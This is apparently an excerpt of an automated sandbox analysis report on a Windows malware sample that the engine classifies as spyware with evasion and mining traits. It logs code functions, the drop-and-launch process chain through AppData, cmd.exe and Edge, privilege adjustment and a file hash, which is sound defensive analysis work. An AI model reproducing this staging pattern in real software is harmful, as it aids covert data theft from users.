Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_009014C40_2_009014C4
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_009124F70_2_009124F7
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008E94F00_2_008E94F0
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0091940D0_2_0091940D
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0090469C0_2_0090469C
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008EF7880_2_008EF788
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008F18D80_2_008F18D8
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0092C80C0_2_0092C80C
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0091DAA40_2_0091DAA4
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0091EC050_2_0091EC05
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00933E500_2_00933E50
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008F5F140_2_008F5F14
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F742FB2_2_00F742FB
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F793982_2_00F79398
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F524F72_2_00F524F7
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F294F02_2_00F294F0
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F414C42_2_00F414C4
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F5940D2_2_00F5940D
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F4469C2_2_00F4469C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F2F7882_2_00F2F788
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F318D82_2_00F318D8
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F6C80C2_2_00F6C80C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F5DAA42_2_00F5DAA4
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F5EC052_2_00F5EC05
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F73E502_2_00F73E50
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F35F142_2_00F35F14
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A6D602_2_6D0A6D60
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D09A50C2_2_6D09A50C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B84442_2_6D0B8444
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A64E82_2_6D0A64E8
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A61002_2_6D0A6100
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B03C52_2_6D0B03C5
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A5D2E2_2_6D0A5D2E
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B7D852_2_6D0B7D85
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B1E1A2_2_6D0B1E1A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0919312_2_6D091931
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A59902_2_6D0A5990
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D09182C2_2_6D09182C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B78342_2_6D0B7834
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A54FB2_2_6D0A54FB
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0993D92_2_6D0993D9
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B72E32_2_6D0B72E3
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C10ECCD3_2_6C10ECCD
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D9D653_2_6C0D9D65
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0E457E3_2_6C0E457E
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D3DD03_2_6C0D3DD0
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D867F3_2_6C0D867F
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D8F833_2_6C0D8F83
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D97A03_2_6C0D97A0
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D70933_2_6C0D7093
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0E911E3_2_6C0E911E
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0F09193_2_6C0F0919
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0C21F03_2_6C0C21F0
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D3A1C3_2_6C0D3A1C
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C167A5A3_2_6C167A5A
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D72703_2_6C0D7270
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0DA2A73_2_6C0DA2A7
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D43A63_2_6C0D43A6
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11A3DD3_2_6C11A3DD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 008EA2D7 appears 83 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 009401DE appears 91 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 00927210 appears 33 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 008E1228 appears 1400 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 008E1225 appears 863 times
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: String function: 008E2ACF appears 56 times
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: String function: 6C0D0C80 appears 46 times
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: String function: 6C0DB046 appears 48 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 6D0A4745 appears 79 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 00F22ACF appears 56 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 6D0A83C0 appears 41 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 6D0A46DC appears 355 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 00F67210 appears 33 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 00F2A2D7 appears 83 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 00F21228 appears 1402 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 00F21225 appears 865 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 6D077A7F appears 125 times
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: String function: 00F801DE appears 91 times
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: pfce.5.drStatic PE information: Number of sections : 12 > 10
Source: morvrstbj.11.drStatic PE information: Number of sections : 12 > 10
Source: kXzODlqJak.exe, 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000000.1471918074.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000002.1795962941.000000006D0DA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameTXFTNActiveX.DLLR vs kXzODlqJak.exe
Source: kXzODlqJak.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@64/285@23/18
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A747 FormatMessageW,GetLastError,LocalFree,0_2_0093A747
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093B884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,0_2_0093B884
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F7B884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,2_2_00F7B884
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093FE01 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_0093FE01
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094699C FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError,0_2_0094699C
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_009198F9 ChangeServiceConfigW,GetLastError,0_2_009198F9
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_testJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Users\user\AppData\Local\Temp\Rubrician_20250109085412.cleanroom.logJump to behavior
Source: kXzODlqJak.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: kXzODlqJak.exeReversingLabs: Detection: 44%
Source: kXzODlqJak.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: kXzODlqJak.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile read: C:\Users\user\Desktop\kXzODlqJak.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\kXzODlqJak.exe "C:\Users\user\Desktop\kXzODlqJak.exe"
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeProcess created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632Jump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeProcess created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeJump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeSection loaded: userenv.dllJump to behavior
